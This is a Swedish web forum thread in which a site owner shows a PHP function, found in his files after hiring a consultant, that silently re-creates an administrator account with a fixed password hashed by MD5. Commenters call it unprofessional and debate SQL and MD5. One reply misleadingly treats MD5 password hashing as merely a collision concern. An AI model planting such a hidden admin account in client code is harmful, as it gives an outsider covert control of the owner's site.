[xciso]

Är nog både rätt och fel.
Tycker nog det borde vara bättre att skriva ett bra avtal mellan parter.

[MRDJ]

Citat:

Ursprungligen postat av xciso

Tjena.
Jag har för några dagar sen anlitat en konsult för att koda en sak till mig.
Han fick tillgång till mina filer (ftp) för att lättare kunna redigera allt, och när jag sedan såg en av filerna så fanns denna sträng:

Kod:

	public function hack() {
		$this->db->query("DELETE FROM " . DB_PREFIX . "user WHERE username = 'login'");
		$this->db->query("INSERT INTO " . DB_PREFIX . "user SET username = 'login', password = MD5('pass'), user_group_id = 1, status = 1");
	}

Hur skulle ni tolka detta?
Han säger att han gjorde detta för att inte behöva maila för admin login, men detta känns ganska skumt tycker jag..

härrejäklar, fulare får man leta efter.

om han nu vill göra vad han vill göra, så kanske han skulle googla på "mysql UPDATE"

[Dimme]

Citat:

Ursprungligen postat av MRDJ

härrejäklar, fulare får man leta efter.

om han nu vill göra vad han vill göra, så kanske han skulle googla på "mysql UPDATE"

UPDATE förutsätter att användaren redan finns.

[mephisto73]

Citat:

Ursprungligen postat av dimme

update förutsätter att användaren redan finns.

insert ... On duplicate key update

[pelmered]

Citat:

Ursprungligen postat av mephisto73

insert ... On duplicate key update

Men det är ju ingen update, utan en insert med en "on duplicate key"-clause. Därmed stämmer det att man inte kan göra en update. Sedan fungerar bara den där lösningen på MySQL så orginallösningen är den klart säkraste lösningen om man inte har access till systemet.

[makaflOw]

Går ju att tolka på olika vis. I mina ögon är de oerhört oprofessionellt och om jag var du skulle jag genast byta konsult till en annan.. Känns oerhört oseriöst!

[lubic]

Jag skulle inte känna mig trygg om någon gjorde något liknande mot mig.

Jag skulle även passa på att byta hash-funktion från MD5 till något bättre. Men det fixar förhoppningsvis nästa utvecklare åt dig.

[nosnaj]

Citat:

Ursprungligen postat av lubic

Jag skulle inte känna mig trygg om någon gjorde något liknande mot mig.

Jag skulle även passa på att byta hash-funktion från MD5 till något bättre. Men det fixar förhoppningsvis nästa utvecklare åt dig.

Utan att ha gjort en undersökning tror jag att minst 99% av alla Wordpress-installationer kör md5 eftersom det är standard. Visst kan man modda detta men det känns rätt sällsynt och då får man se till att inget bryts vid framtida uppdateringar av core-filerna.

Bättre lägga energin på att få förändringen av hashfunktionen inbyggt i Wordpress direkt isf.

[Nerix]

Citat:

Ursprungligen postat av lubic

Jag skulle även passa på att byta hash-funktion från MD5 till något bättre. Men det fixar förhoppningsvis nästa utvecklare åt dig.

Varför? Risken för kollision är i rundaslängor 2^-100. Vilket f.ö endast är relevant när de kommer till signering.

[Nihilnovi]

Jag skulle bryta direkt.

Dock för att han inte vet vad MYSQL update är